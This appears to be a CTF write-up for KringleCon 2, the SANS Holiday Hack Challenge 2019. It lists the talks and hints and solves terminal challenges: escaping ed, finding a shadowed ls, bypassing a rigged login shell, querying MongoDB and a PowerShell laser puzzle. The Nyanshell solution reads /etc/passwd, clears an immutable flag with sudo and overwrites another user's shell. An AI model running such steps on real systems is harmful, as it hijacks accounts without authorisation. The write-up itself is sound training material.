KringleCon 2: Turtle Doves

Every year the Counter Hack team outdoes themselves by making one of the most fun CTF challenges anywhere. It never fails to introduce us to exciting technologies and teach us new skills. It’s no exaggeration to say this is why we look forward to the holiday season.

From the bottom of our hearts, we’d like to thank everyone who makes Holiday Hack and KringleCon happen.

Talks

Welcome to KringleCon 2: Turtle Doves

Ed Skoudis presents a welcome to KringleCon with tips on how to use your badge, solve objectives, and get hints through terminal challenges. Also, he talks about the missing Turtle Doves and how YOU can help solve that crisis.

Ed Skoudis

https://youtube.com/watch?v=iUF5pBv7ukM

Keynote: A Hunting We Must Go

In this talk, John will cover some of the interesting things he has discovered while doing Threat Hunts for his customers. He will also share free tools to get this done. Why??? Because giving is the reason for the season.

John Strand

https://youtube.com/watch?v=jxOZ5u2CYWw

Reversing Crypto the Easy Way

Have you ever run into an application that encrypts network traffic or files, and wished you could figure out what’s going on? It’s not always difficult! Did you know that a made-up 90% of all crypto makes the same few mistakes? And that some of those mistakes are easy to find? By the end of this short presentation, you’ll be an expert in finding simple crypto mistakes!

Ron Bowes

https://youtube.com/watch?v=obJdpKDpFBA

Machine Learning Use Cases for Cyber Security

In this talk, Chris Davis, discusses many theoretical use cases for machine learning and neural networks for offensive and defensive security. Chris then demonstrates using machine learning for image recognition.

Chris Davis

https://youtube.com/watch?v=jmVPLwjm_zs

Web Apps: A Trailhead

Web applications, seen and unseen, dominate our interactions with the Internet. Understanding what they are and the part they play is instrumental to defending organizations online. Let’s take a look at an example web application, some vulnerabilities it has, and what we could be doing to strengthen our defenses.

Chris Elgee

https://youtube.com/watch?v=0T6-DQtzCgM

Optical Decoding of Keys

While many individuals understand the need to safeguard their keys from strangers, this caution typically comes in the form of unwillingness to physically hand them to maintenance staff, valet drivers, or someone who just needs to open a door and then bring the keys right back. However, do you know that equal caution is merited when it comes to people seeing your keys? Believe it or not, but it is possible to use a photograph of a key to reverse-engineer out the bitting data… a series of numbers that can be used to produce a copy, even if you never have the source key in your physical possession. This mini talk will step you through the process… live.

Deviant Ollam

https://youtube.com/watch?v=KU6FJnbkeLA

Over 90,000: Ups and Downs of my InfoSec Twitter Journey

One night, Lesley shrugged and decided to try this silly Twitter thing, after all. 10 years and 100,000 followers later, she manages one of the most followed infosec accounts on the site. There have been definite upsides and downsides to having a platform, and she’s watched the best and worst days of the hacking and cybersecurity communities over the years. In this talk, she’ll talk about lessons she’s learned, how social media can be leveraged to do good, and where we go from here in an era of change.

Lesley Carhart

https://youtube.com/watch?v=RplOa_lqXvk

How to (Holiday) Hack It: Tips for Crushing CTFs & Pwning Pentests

The CTF starts, the pentest begins, and… what happens, again? Even when we follow the steps we’re told, things don’t go as expected. A scan won’t always give us the answer. An exploit won’t run. Our awesome CTF buddy can’t make it out to help us. We’re running out of time!! What’s supposed to happen when we get stuck? We’ll borrow some academic wisdom on heuristics and mix it with a hacker’s methodology to give your thinking a boost for this year’s Holiday Hack, and whatever challenge you’ve got next. Expect a quick holiday jaunt through problem-solving in a pinch!

Katie Knowles

https://youtube.com/watch?v=c02mH7F1xvU

Logs? Where we’re going we don’t need logs.

It never fails. You show up to do incident response and ask to see your customer’s logs. Inevitably the logs either don’t exist or they are missing key pieces of data required for your investigation. What if you could go back in time and capture every process that executed on every host over the last 30 days? What if you could go back in time and see which wired and wireless networks were used and how much data was transferred across them? What if you could go back in time and capture the unique SID of every user that executed every process even if the attackers deleted the accounts they used? Great news, you can and it doesn’t even require 1.21 gigawatts! In this talk I’ll show you srum_dump.exe and ese2csv.exe and how you can retrofit any incident with 30 days of historical logs.

Mark Baggett

https://youtube.com/watch?v=Dx78oObfiBM

When Malware Goes Mobile, Quick Detection is Critical

In less than 10 minutes, Heather will demonstrate detection of malware on an Android-powered phone. Her easy to follow method also uncovers how the phone became infected in the first place. With this insight, you are empowered to understand and neutralize the threat. The rest is up to the examiner.

Heather Mahalik

https://youtube.com/watch?v=IEbLOvT4Fts

Santa’s Naughty List: Holiday Themed Social Engineering

Get yourself a warm cup of cocoa, cozy up, and join Snow from the North Pole as she discusses tips and tricks on how to elevate Social Engineering assessments during the holiday season! That’s right Q4, the most busy time of the year. Social Engineering assessments types covered will include Phishing, and Physical Security. Warning: these tactics may land you on the naughty list alongside of Hans Gruber, the Wet Bandits, Mr. Oogie Boogie, and many Gremlins.

Snow

https://youtube.com/watch?v=HKLSmbOXJRU

Dashing Through the Logs

If you want your hunt to be successful, you need to look where the threats are. In modern environments, that means collecting endpoint and email logs and knowing what to search for in it. In this talk, we will cover critical Windows-based security event log sources like Sysmon, PowerShell, and process launch events. Additionally, we will introduce the stoQ automation framework for analyzing email. We’ll show you how to use this data to pragmatically hunt for threats operating in your environment.

James Brodsky

https://youtube.com/watch?v=qbIhHhRKQCw

Learning to Escape Containers

Containers aren’t magic, and understanding how they work can help you understand how to break them. Let’s learn some Linux low levels, and demonstrate a container escape to put theory into practice.

Ian Coldwater

https://youtube.com/watch?v=S3gfEDEB_l0

Telling Stories from the North Pole

Phishing organizations is nothing new and companies have continued to focus on perimeter defenses, endpoint visibility, and education of users. This talk applies a new spin on social-engineering knowing that we will be generating alarms to security analysts and building that into the attack. This talk has a walkthrough of a live demonstration circumventing anti-virus products protection methods as well as a story template used for when we get detected, a way to look more legitimate for remote code execution. This talk focuses on offensive capabilities, our next view into the evolution of hacking, and most importantly, what we can do as defenders to get better at what we do.

Dave Kennedy

https://youtube.com/watch?v=9QuOhRGvryc

5 Steps to Build and Lead a Team of Holly Jolly Hackers

So your company, your school, or your community wants to get into cybersecurity. How do you do that? How do you put together a team of people that know and understand that stuff? In this talk, John presents a 5-step plan for building an effective and collaborative cybersecurity team through gamified training programs. It turns out cultivating a team and fostering an environment to encourage growth can be done with simple techniques: it just takes a personal touch to a digital world.

John Hammond

https://youtube.com/watch?v=D5Nwg84cV1E

Hints

Deep Blue CLI on Github

Github page for DeepBlueCLI

https://github.com/sans-blue-team/DeepBlueCLI

From: Bushy Evergreen

Linux Path

Green words matter, files must be found, and the terminal’s $PATH matters.

From: SugarPlum Mary

User’s Shells

On Linux, a user’s shell is determined by the contents of /etc/passwd

From: Alabaster Snowball

Chatter?

sudo -l says I can run a command as root. What does it do?

From: Alabaster Snowball

Frosty Keypad

One digit is repeated once, it’s prime, and you can see which keys were used

From: Tangle Coalbox

Event IDs and Sysmon

(Events and Sysmon)

From: Pepper Minstix

SQL Injection

SQL Injection from OWASP

https://www.owasp.org/index.php/SQL_Injection

From: Pepper Minstix

Bitting Templates

Deviant’s Key Decoding Templates

https://github.com/deviantollam/decoding

From: Minty Candycane

Cranberry Pis

_images/cranpi.png

Escape Ed

Goal

Escape the standard editor.

Location

Train Station

Dialog

elf

Bushy Evergreen

Before Solving

Hi, I'm Bushy Evergreen. Welcome to Elf U!
I'm glad you're here. I'm the target of a terrible trick.
Pepper Minstix is at it again, sticking me in a text editor.
Pepper is forcing me to learn ed.
Even the hint is ugly. Why can't I just use Gedit?
Please help me just quit the grinchy thing.
After Solving

Wow, that was much easier than I'd thought.
Maybe I don't need a clunky GUI after all!
Have you taken a look at the password spray attack artifacts?
I'll bet that DeepBlueCLI tool is helpful.
You can check it out on GitHub.
It was written by that Eric Conrad.
He lives in Maine - not too far from here!

Solution

Answer

q

Explanation

q is short for quit! If you visited the page for the hint, the last bullet tells you: “When done editing, give the command “w”, then “q”.”

From the ed man page:

Quit Command
    Synopsis:
                  q

    The  q command shall cause ed to exit. If the buffer has changed since the last time
    the entire buffer was written, the user shall be warned, as described previously.

Quit Without Checking Command
    Synopsis:
                  Q

    The Q command shall cause ed to exit without checking whether changes have been made
    in the buffer since the last w command.

Misc

This is very similar to the “Escape Vim” challenge from last year.

Linux Path

Goal

List the files in your home directory by using the correct ls.

Location

Hermey Hall

Dialog

SugarPlum Mary

SugarPlum Mary

Before Solving

Oh me oh my - I need some help!
I need to review some files in my Linux terminal, but I can't get a file listing.
I know the command is ls, but it's really acting up.
Do you think you could help me out? As you work on this, think about these questions:
    1. Do the words in green have special significance?
    2. How can I find a file with a specific name?
    3. What happens if there are multiple executables with the same name in my $PATH?
After Solving

Oh there they are! Now I can delete them. Thanks!
Have you tried the Sysmon and EQL challenge?
If you aren't familiar with Sysmon, Carlos Perez has some great info about it.
Haven't heard of the Event Query Language?
Check out some of Ross Wolf's work on EQL or that blog post by Josh Wright in your badge.

Solution

Hint

Linux Path

Answer

/bin/ls

Explanation

When we try to run ls, we’re told “This isn’t the ls you’re looking for”. To see where the binary is being called from we can use which ls. This tells us we’re running ls from /usr/local/bin/ which isn’t normally where it’s located. The challenge is made much easier if we listen to SugarPlum’s hint and notice the green words in the intro: file, home/, ls, which, find, path, and locate. which, find, and locate can all be used to find other instances of ls.

which -a will search for all occurrences of ls in our $PATH, instead of just stopping at the first one it finds.

find / -name "ls" 2>/dev/null will search for a file named “ls” starting at the root directory “/”. The “2>/dev/null” just prevents any errors being printed to our screen.

locate */ls 2>/dev/null will search the mlocate database for any files named “ls” and, just like before, hide any errors. The syntax for locate (GNU version) is a little weird, so it’s important to read the man page:

If a pattern is a plain string -- it contains no metacharacters -- locate displays all file names in the database that contain that string anywhere. If a pattern does contain metacharacters, locate only displays file names that match the pattern exactly. As a result, patterns that contain metacharacters should usually begin with a `*', and will most often end with one as well. The exceptions are patterns that are intended to explicitly match the beginning or end of a file name

Once we know the “real” path to ls, we again have a few options. If we’re just trying to complete the challenge we can call /bin/ls and be done, but if we want to correct our $PATH we can move /usr/local/bin/ to the end so that /bin/ is searched first, like this: export PATH=/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/bin. Another option, if we don’t want to mess with our path, is to use hash. This is a bash built-in that keeps track of binaries we’ve run and their locations, and that table is consulted before $PATH is searched. We can add the path to the correct ls with hash -p /bin/ls ls.
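The $PATH lookup that makes this challenge work, as an added example (not code from the challenge): it walks a search path the way which -a does, lists every candidate in lookup order, and flags a command whose first hit is not the path you expect. The directory layout it builds under mktemp is constructed to mirror the challenge (a wrapper ls ahead of the real one).

```bash
#!/bin/bash
# Added example: reimplement the "which -a" walk over a PATH-style string so
# shadowing (a wrapper in /usr/local/bin ahead of /bin/ls) becomes visible.

# Print every regular executable named $1 found in the search path $2
# (defaults to $PATH), in lookup order. The first line is what the shell runs.
find_in_path() {
    local name="$1" searchpath="${2:-$PATH}" dir
    local IFS=':'
    for dir in $searchpath; do
        if [ -z "$dir" ]; then dir="."; fi      # an empty PATH entry means the cwd
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            printf '%s\n' "$dir/$name"
        fi
    done
}

# Return 0 when the first hit for $1 is exactly $2; otherwise warn and return 1.
check_shadowed() {
    local name="$1" expected="$2" searchpath="${3:-$PATH}" first
    first=$(find_in_path "$name" "$searchpath" | head -n 1)
    if [ "$first" = "$expected" ]; then
        return 0
    fi
    printf 'WARNING: %s resolves to %s, expected %s\n' \
        "$name" "${first:-<none>}" "$expected" >&2
    return 1
}

# Constructed layout modelled on the challenge box: a "real" ls in bin/ and a
# wrapper in usr/local/bin/ that sits earlier in the search path.
make_demo_tree() {
    local root
    root=$(mktemp -d)
    mkdir -p "$root/usr/local/bin" "$root/bin"
    printf '#!/bin/sh\necho "This is not the ls you are looking for"\n' > "$root/usr/local/bin/ls"
    printf '#!/bin/sh\necho "real ls"\n' > "$root/bin/ls"
    chmod +x "$root/usr/local/bin/ls" "$root/bin/ls"
    printf '%s\n' "$root"
}

demo() {
    local root sp
    root=$(make_demo_tree)
    sp="$root/usr/local/bin:$root/bin"
    echo "all ls candidates, in lookup order:"
    find_in_path ls "$sp"
    check_shadowed ls "$root/bin/ls" "$sp" || echo "ls is shadowed; call /bin/ls or fix PATH"
    rm -rf "$root"
}
demo
```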

Misc

hash is actually a pretty useful command. Say we’re repeatedly calling a script that’s not in our path and we’re sick of typing the /very/long/pathname; we can add it with hash.

In this challenge, /bin/ls is a bash script which wraps the actual ls binary which was renamed to /bin/darealmvp. It also calls /usr/local/bin/.things/success which is what gives us credit for completing the challenge. If you somehow had prior knowledge of that binary, you could run it to get credit without doing the challenge.

Contents of /bin/ls

#!/bin/bash
/bin/darealmvp --color=auto $1

FILE=/tmp/solved.nul
if test -f "$FILE"; then
    echo -n ''
else
    echo -n ' ' > /tmp/solved.nul
    /usr/local/bin/.things/success
fi

There are a few additional files we can look at if we run /bin/ls -la. There’s an empty directory named “ ”, the rejected logos, and ASCII art of an elf screaming.

Contents of /home/elf/rejected-elfu-logos.txt

        _
       / \
       \_/
       / \
      /   \
     /    |
    /     |
   /       \
 _/_________|_
 (____________)

Get Elfed at ElfU!


  ()
  |\__/------\
  \__________/
  Walk a Mile in an elf's shoes
  Take a course at ElfU!


  ____\()/____
  |    ||    |
  |    ||    |
  |====||====|
  |    ||    |
  |    ||    |
  ------------
Be present in class
Fight, win, kick some grinch!
Contents of /home/elf/.elfscream.txt

_images/elfscream.png

Nyanshell

Goal

Log in as alabaster_snowball and bypass the nyan shell.

Location

Speaker UNpreparedness Room

Dialog

Alabaster Snowball

Alabaster Snowball

Before Solving

Welcome to the Speaker UNpreparedness Room!
My name's Alabaster Snowball and I could use a hand.
I'm trying to log into this terminal, but something's gone horribly wrong.
Every time I try to log in, I get accosted with ... a hatted cat and a toaster pastry?
I thought my shell was Bash, not flying feline.
When I try to overwrite it with something else, I get permission errors.
Have you heard any chatter about immutable files? And what is sudo -l telling me?
After Solving

Who would do such a thing?? Well, it IS a good looking cat.
Have you heard about the Frido Sleigh contest?
There are some serious prizes up for grabs.
The content is strictly for elves. Only elves can pass the CAPTEHA challenge required to enter.
I heard there was a talk at KCII about using machine learning to defeat challenges like this.
I don't think anything could ever beat an elf though!

Solution

Answer

su - alabaster_snowball
cat /etc/passwd
lsattr /bin/nsh
sudo -l
sudo chattr -i /bin/nsh
cat /bin/bash > /bin/nsh
su - alabaster_snowball

Explanation

When logging in as alabaster_snowball, we’re met with the nyancat animation instead of a normal shell. To see what Alabaster’s default login shell is, we can cat /etc/passwd, which is readable by anyone. We will see that /bin/nsh is Alabaster’s default shell.

Checking /bin/nsh’s permissions with ls -l /bin/nsh shows anyone is able to edit it since it has 777 permissions. This means we could rewrite it with something more useful, like bash. However, when we actually try to do this, we get permission denied.

Alabaster asked us before we started if we had “… heard any chatter about immutable files?”, which is a huge hint for this challenge. On Linux, in addition to the regular read, write, and execute permissions, files have extended attributes.

To check what these are, we can run lsattr /bin/nsh. We can see the i flag is set, which means that the file is immutable (it can’t be changed). In order to remove that flag, we need to use chattr -i /bin/nsh but superuser permissions are required to apply or remove the immutable flag. We can check what commands we’re allowed to run as root by using sudo -l and sure enough, we’re allowed to run chattr. With a sudo chattr -i /bin/nsh we can remove the immutable flag.

From chattr man page

A file with the 'i' attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode. Only the superuser or a process possessing the CAP_LINUX_IMMUTABLE capability can set or clear this attribute.

Since the file is now mutable (editable) once again, we can overwrite it with bash: cat /bin/bash > /bin/nsh (careful to only have one ‘>’ here).

Now when we log in su - alabaster_snowball, we’re met with a bash shell and a success message!
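The two checks this challenge turns on, the login shell in /etc/passwd and the immutable attribute from lsattr, as an added audit example (not code from the challenge). It takes the passwd and /etc/shells contents as files and an lsattr output line as text, so it can be run offline against copied data; the sample records are constructed.

```bash
#!/bin/bash
# Added example: audit login shells against /etc/shells and detect the
# immutable (i) attribute in lsattr output, the two facts behind nyanshell.

# Read passwd-format text on stdin and print "user shell" for every account
# whose login shell is not listed in the /etc/shells-format file $1.
nonstandard_shells() {
    local shells_file="$1"
    awk -F: -v shells="$shells_file" '
        BEGIN {
            while ((getline line < shells) > 0)
                if (line !~ /^#/ && line != "") ok[line] = 1
        }
        $0 ~ /^#/ || NF < 7 { next }      # skip comments and malformed lines
        !($7 in ok) { print $1, $7 }      # field 7 is the login shell
    '
}

# Return 0 when an lsattr output line such as
# "----i---------e------- /bin/nsh" has the lowercase i (immutable) flag set.
has_immutable_flag() {
    local flags="${1%% *}"                # attribute field is the first word
    case "$flags" in
        *i*) return 0 ;;
        *)   return 1 ;;
    esac
}

demo() {
    local tmp
    tmp=$(mktemp -d)
    # constructed sample data modelled on the challenge box
    printf '/bin/sh\n/bin/bash\n' > "$tmp/shells"
    printf 'root:x:0:0:root:/root:/bin/bash\nelf:x:1000:1000::/home/elf:/bin/bash\n' > "$tmp/passwd"
    printf 'alabaster_snowball:x:1001:1001::/home/alabaster_snowball:/bin/nsh\n' >> "$tmp/passwd"
    nonstandard_shells "$tmp/shells" < "$tmp/passwd"       # alabaster_snowball /bin/nsh
    if has_immutable_flag "----i---------e------- /bin/nsh"; then
        echo "/bin/nsh is immutable; chattr -i needs root or CAP_LINUX_IMMUTABLE"
    fi
    rm -rf "$tmp"
}
demo
```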

Misc

There was a past challenge that also focused on the immutable bit.

There is a binary in /home/alabaster_snowball called “success” which is automatically executed by Alabaster’s .binrc file when we log in. This works if we log in with /bin/sh or /bin/bash, but if for some reason you attempted to use /bin/dash, you would not get credit. If you then tried to manually run the success file, you would get the message below:

Loading, please wait......


I'm very sorry, but we seem to have an internal issue preventing the successful
completion of this challenge. Please email support@holidayhackchallenge.com
with a screenshot or any other details you can provide. Thank you!

Mongo Pilfer

Goal

Get connected to the Mongo database and find the solution.

Location

Netwars Room

Dialog

Holly Evergreen

Holly Evergreen

Before Solving

Hey! It's me, Holly Evergreen! My teacher has been locked out of the quiz database and can't remember the right solution.
Without access to the answer, none of our quizzes will get graded.
Can we help get back in to find that solution?
I tried lsof -i, but that tool doesn't seem to be installed.
I think there's a tool like ps that'll help too. What are the flags I need?
Either way, you'll need to know a teensy bit of Mongo once you're in.
Pretty please find us the solution to the quiz!
After Solving

Woohoo! Fantabulous! I'll be the coolest elf in class.
On a completely unrelated note, digital rights management can bring a hacking elf down.
That ElfScrow one can really be a hassle.
It's a good thing Ron Bowes is giving a talk on reverse engineering!
That guy knows how to rip a thing apart. It's like he breathes opcodes!

Solution

Hint

MongoDB

Answer

netstat -na | grep LIST
mongo 127.0.0.1:12121
show dbs
use elfu
show tables
db.solution.find()
db.loadServerScripts();displaySolution();

Explanation

The first step is finding what port mongo is listening on: netstat -na | grep LIST or ps -ef. The first will show listening ports, the second will show the port command line argument passed to mongod (the MongoDB daemon).

Next is to connect to it by appending the port after the localhost IP: mongo 127.0.0.1:12121

Now that we’re connected, we can list the databases with show dbs and connect to the elfu database with use elfu. Listing collections is much the same as listing the databases, show collections and here we can see a “solution” collection. If you’re more accustomed to MySQL, you can still use show tables which will do the same thing.

To select everything from the solution table we can run db.solution.find() after which we’re given the answer db.loadServerScripts();displaySolution();

When we run that command, we get credit for the challenge and a Christmas tree animation.

Misc

This link is helpful if you’re used to SQL but not mongo: https://docs.mongodb.com/manual/reference/sql-comparison/

There are some other databases and collections we can poke around in.

> use test
switched to db test

> show tables
redherring

> db.redherring.find()
{ "_id" : "This is not the database you're looking for." }

> use elfu
switched to db elfu

> show collections
bait
chum
line
metadata
solution
system.js
tackle
tincan

> db.bait.find()
{ "_id" : "Gait" }

> db.chum.find()
{ "_id" : "Yum!" }

> db.line.find()
{ "_id" : "Tensile strength" }

> db.tackle.find()
{ "_id" : "Mackerel?" }

> db.tincan.find()
{ "_id" : "SARDINES" }

Creation Date: November 27 2019

Xmas Cheer Laser

Goal

Get the laser’s power to go above 5 Mega-Jollies of power.

This is a multi-part challenge in which we must discover the correct settings to get the laser to max power. We need to know refraction, temperature, angle, and gas composition. The solutions are hidden throughout the machine with several riddles along the way.

Location

Laboratory

Dialog

Sparkle Redberry

Sparkle Redberry

Before Solving

I'm Sparkle Redberry and Imma chargin' my laser!
Problem is: the settings are off.
Do you know any PowerShell?
It'd be GREAT if you could hop in and recalibrate this thing.
It spreads holiday cheer across the Earth ...
... when it's working!
After Solving

You got it - three cheers for cheer!
For objective 5, have you taken a look at our Zeek logs?
Something's gone wrong. But I hear someone named Rita can help us.
Can you and she figure out what happened?

Solution

Hint

Powershell

Answer

get-content /home/callingcard.txt
get-history
Get-Childitem env:
(Get-Childitem env:riddle).Value
expand-archive -path $((get-childitem -path /etc/ -recurse | sort LastWriteTime -bottom 1).fullname)
gci .
gci ./archive
gci ./archive/refraction
chmod +x ./archive/refraction/runme.elf; ./archive/refraction/runme.elf
gc ./archive/refraction/riddle
gci -file -recurse depths | %{ $hash = (get-filehash -algorithm md5 -path $_).hash; if ($hash -eq "25520151A320B5B0D21561F92C8F6224") { write-host $_ } }
gc /home/elf/depths/produce/thhy5hll.txt
(gci -recurse depths).fullname | sort -property length -bottom 1
gc /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/fox/0jhj5xz6.txt
"bushy", "alabaster", "minty", "holly" | %{ stop-process (get-process -includeusername | where username -like   $_).id }
gc /shall/see
(gci /etc -include *.xml -recurse).fullname
[xml] $xml = gc /etc/systemd/system/timers.target.wants/EventLog.xml
sleep 5
($xml.objs.obj.props.i32 | %{ if ($_.N -eq "Id") { $_.'#text' } } | group | sort -unique).name
($xml.objs.obj.props | %{ if ($_.i32.N -eq "Id" -and $_.i32.'#text' -eq 1 ) { $_ } }).innertext
(Invoke-WebRequest -Uri http://localhost:1225/api/off).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/refraction?val=1.867).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/temperature?val=-33.5).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/angle?val=65.5).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/gas -method post -body 'O=6&H=7&He=3&N=4&Ne=22&Ar=11&Xe=10&F=20&Kr=8&Rn=9').RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/on).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/output).RawContent

Explanation

The introduction text tells us the intruder left behind a note at /home/callingcard.txt, so let’s start there.

1) Read /home/callingcard.txt

Get-Content /home/callingcard.txt

What's become of your dear laser?
Fa la la la la, la la la la
Seems you can't now seem to raise her!
Fa la la la la, la la la la
Could commands hold riddles in hist'ry?
Fa la la la la, la la la la
Nay! You'll ever suffer myst'ry!
Fa la la la la, la la la la

The riddle in the calling card points us at “command … hist’ry”.

2) Read history

PS> Get-History

Id CommandLine
-- -----------
 1 Get-Help -Name Get-Process
 2 Get-Help -Name Get-*
 3 Set-ExecutionPolicy Unrestricted
 4 Get-Service | ConvertTo-HTML -Property Name, Status > C:\services.htm
 5 Get-Service | Export-CSV c:\service.csv
 6 Get-Service | Select-Object Name, Status | Export-CSV c:\service.csv
 7 (Invoke-WebRequest http://127.0.0.1:1225/api/angle?val=65.5).RawContent
 8 Get-EventLog -Log "Application"
 9 I have many name=value variables that I share to applications system wide. At a com...
10 get-content /home/callingcard.txt

That did it: we can see the angle being set in line 7 and the next riddle in line 9.

Answer

angle?val=65.5

Unfortunately, the riddle is cut off. One way we can get the whole thing is like this:

PS> write-host (get-history)

I have many name=value variables that I share to applications system wide. At a command I will reveal my secrets once you Get my Child Items.

System-wide variables that look like “name=value”? That couldn’t be anything other than environment variables.

3) Get Environment Variables

The environment variables can be read using Get-ChildItem

PS> Get-ChildItem env:

Name                           Value
----                           -----
_                              /bin/su
DOTNET_SYSTEM_GLOBALIZATION_I… false
HOME                           /home/elf
HOSTNAME                       63a37a64da26
LANG                           en_US.UTF-8
LC_ALL                         en_US.UTF-8
LOGNAME                        elf
MAIL                           /var/mail/elf
PATH                           /opt/microsoft/powershell/6:/usr/local/sbin:/usr/local/bi…
PSModuleAnalysisCachePath      /var/cache/microsoft/powershell/PSModuleAnalysisCache/Mod…
PSModulePath                   /home/elf/.local/share/powershell/Modules:/usr/local/shar…
PWD                            /home/elf
RESOURCE_ID                    b599fc85-f803-4b40-9cc1-0e89f0a0a157
riddle                         Squeezed and compressed I am hidden away. Expand me from …
SHELL                          /home/elf/elf
SHLVL                          1
TERM                           xterm
USER                           elf
USERDOMAIN                     laserterminal
userdomain                     laserterminal
USERNAME                       elf
username                       elf

The riddle is a little cut off, but we can get it by:

PS> (Get-Childitem env:riddle).Value

Squeezed and compressed I am hidden away. Expand me from my prison and I will show you the way. Recurse through all /etc and Sort on my LastWriteTime to reveal im the newest of all.

We need to search through /etc and find the newest file.

4) Find the zip file

Listing directory contents can be achieved with Get-ChildItem. This command has some optional parameters which are important for this challenge: -path, which defines the directory we should be looking in, and -recurse, which means to continue into any other directories it encounters. We can pass the output of Get-ChildItem -path /etc/ -recurse into a sort function and tell it which attribute to sort on and to return the last entry. If we wrap the whole thing in parentheses, we can then tell PowerShell to only output the .fullname. This will return the newest file in /etc, /etc/apt/archive. To unzip that file, we can use Expand-Archive.

PS> (Get-ChildItem -path /etc/ -recurse | sort LastWriteTime -bottom 1).fullname
PS> Expand-Archive -path /etc/apt/archive

OR

PS> Expand-Archive -path $((Get-ChildItem -path /etc/ -recurse | sort LastWriteTime -bottom 1).fullname)

This creates a couple of folders (in your current directory): “archive” and, inside that, “refraction”. This is all a lot to type, so let’s start using command aliases from now on.

PS> gci refraction

Directory: /home/elf/archive/refraction

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
------           11/7/19 11:57 AM            134 riddle
------           11/5/19  2:26 PM        5724384 runme.elf

PS> gc ./refraction/riddle

Very shallow am I in the depths of your elf home. You can find my entity by using my md5 identity:

25520151A320B5B0D21561F92C8F6224

Looks like we’re not done recursing, except now we need to key off of the hashes instead of the LastWriteTime.

There’s also a binary called “runme.elf” that we should probably listen to and run.

5) Run runme.elf

Even though we’re running PowerShell, we’re still on a Linux OS, which means before we run the file, we need to add the executable bit.

PS> chmod +x runme.elf; ./runme.elf

refraction?val=1.867

Answer

refraction?val=1.867

Awesome, we got the refraction value.

6) Find the file in our home directory with the hash 25520151A320B5B0D21561F92C8F6224

Get-FileHash will give us the file hashes, but we need to make sure we use the correct algorithm with -algorithm md5.

Just like before, we can recurse through the folder and pass the output to our next command. In this case, we can use %{ <code> }, which acts as a foreach loop in PowerShell. For each filename in “depths”, we need to get the hash and, if the hash equals the one we’re looking for, write the filename to the console.

PS> gci -file -recurse depths | %{ $hash = (get-filehash -algorithm md5 -path $_).hash; if ($hash -eq "25520151A320B5B0D21561F92C8F6224") { write-host $_ } }

/home/elf/depths/produce/thhy5hll.txt

PS> gc /home/elf/depths/produce/thhy5hll.txt

temperature?val=-33.5

I am one of many thousand similar txt's contained within the deepest of /home/elf/depths. Finding me will give you the most strength but doing so will require Piping all the FullName's to Sort Length.

And there’s the temperature!

Answer

temperature?val=-33.5

The last value we need is the gas composition, which is also hidden in “depths”

7) Find the file in depths with the longest fullname

Just like the other searches we can use gci -recurse but this time we want to pass the “fullname” attribute into the sort function and sort on the length.

PS> (gci -recurse depths).fullname | sort -property length -bottom 1

/home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/fox/0jhj5xz6.txt

That’s a pretty long name; if we don’t want to type it, we can just run gc with our last command in parentheses.

PS> gc ((gci -recurse depths).fullname | sort -property length -bottom 1)

Get process information to include Username identification. Stop Process to show me you're skilled and in this order they must be killed:

bushy
alabaster
minty
holly

Do this for me and then you /shall/see .

Okay, almost at the end; we just need to kill four processes in the correct order. Then we’ll be able to read a file, “/shall/see”.

8) Kill the processes in the correct order

PS> "bushy", "alabaster", "minty", "holly" | %{ kill (gps -includeusername | where username -like $_).id }

Now, the “/shall/see” file exists.

PS> gc /shall/see

Get the .xml children of /etc - an event log to be found. Group all .Id's and the last thing will be in the Properties of the lonely unique event Id.

9) Find the xml file and find the uniq id

First, let’s find the xml file.

PS> (gci /etc -include *.xml -recurse).fullname

/etc/systemd/system/timers.target.wants/EventLog.xml

To read the XML data into a variable, we can cast the file content to the built-in [xml] type.

PS> [xml] $xml = gc /etc/systemd/system/timers.target.wants/EventLog.xml

Here’s an example of one of the events

<Obj RefId="16070">
   <TNRef RefId="0" />
   <ToString>System.Diagnostics.Eventing.Reader.EventLogRecord</ToString>
   <Props>
     <I32 N="Id">5</I32>

That last event Id is what we need to key off; we can reference it as $xml.objs.obj.props.i32.N. The logic below keeps only the I32 elements whose N attribute is "Id", groups them by value, and keeps the group that occurs exactly once: that is the lonely unique event Id.

PS> ($xml.objs.obj.props.i32 | where N -eq "Id" | group "#text" | where Count -eq 1).Name

1

Okay, now that we know the unique id is “1”, let’s get the event.

PS> ($xml.objs.obj.props | %{ if ($_.i32.N -eq "Id" -and $_.i32.'#text' -eq 1 ) { $_ } }).innertext

